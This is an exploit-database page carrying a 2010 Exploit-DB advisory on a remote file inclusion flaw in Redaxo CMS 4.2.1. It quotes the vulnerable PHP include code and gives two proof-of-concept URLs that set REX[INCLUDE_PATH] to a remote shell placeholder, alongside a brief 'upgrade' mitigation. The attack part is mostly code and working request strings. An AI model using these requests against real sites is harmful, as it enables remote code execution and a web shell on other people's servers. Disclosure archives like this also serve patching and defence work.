header-logo
Suggest Exploit
vendor:
Redaxo CMS
by:
eidelweiss
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Redaxo CMS
Affected Version From: 4.2.1
Affected Version To: 4.2.1
Patch Exists: YES
Related CWE: CVE-2010-1490
CPE: a:redaxo:redaxo:4.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2010

Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability

Redaxo CMS 4.2.1 is vulnerable to a remote file inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server.

Mitigation:

Upgrade to the latest version of Redaxo CMS.
Source

Exploit-DB raw data:

========================================================================
	Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor:		www.redaxo.de
Download:	http://www.redaxo.de/files/redaxo4_2_1.zip

Author:		eidelweiss
Contact:	eidelweiss[at]cyberservices.com
Thank`s:	r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
		sp3x (securityreason) get-well brother

Advisories:	http://eidelweiss-advisories.blogspot.com/2010/04/redaxo-cms-421-remote-file-inclusion.html

========================================================================

Description:

So soll ein Content-Management-System sein. REDAXO vereint hohe Flexibilität mit einfacher Handhabung für sinnvolle Nutzung.
Es eignet sich sowohl für kleinere Auftritte als auch für große und komplexe Internetportale.
Dank des modularen Aufbaus und der vielen Erweiterungsmöglichkeiten deckt REDAXO alle erforderlichen Funktionalitäten eines umfassenden Redaktionssystems ab.
Zusätzlich ist REDAXO ein Open-Source-System und somit kostenlos und kommerziell frei verwendbar.

========================================================================

	-=[ VULN C0de ]=-

**************************************************
[-] redaxo/include/pages/specials.inc.php
**************************************************

// -------------- Defaults

$subpage = rex_request('subpage', 'string');
$func = rex_request('func', 'string');

// -------------- Header

$subline = array(
  array( '', $I18N->msg('main_preferences')),
  array( 'lang', $I18N->msg('languages')),
);

rex_title($I18N->msg('specials'),$subline);

switch($subpage)
{
  case 'lang': $file = 'specials.clangs.inc.php'; break;
  default : $file = 'specials.settings.inc.php'; break;
}

require $REX['INCLUDE_PATH'].'/pages/'.$file;

**************************************************
[-] redaxo/include/addons/version/pages/index.inc.php
**************************************************

require $REX['INCLUDE_PATH'].'/layout/top.php';

rex_title('Version AddOn');

?>
<div class="rex-addon-output">
	<h2 class="rex-hl2"><?php echo $I18N_A461->msg('code_for_module_input'); ?></h2>

	<div class="rex-addon-content">
		<p class="rex-tx1"><?php echo $I18N_A461->msg('module_intro_help'); ?></p>
		<p class="rex-tx1"><?php echo $I18N_A461->msg('module_rights'); ?></p>
	</div>

</div>

<?php
require $REX['INCLUDE_PATH'].'/layout/bottom.php';

========================================================================

	-=[ P0C ]=-

	http://127.0.0.1/redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll]

	http://127.0.0.1/redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=================================

Navigation

Suggest Exploit

Services By CQR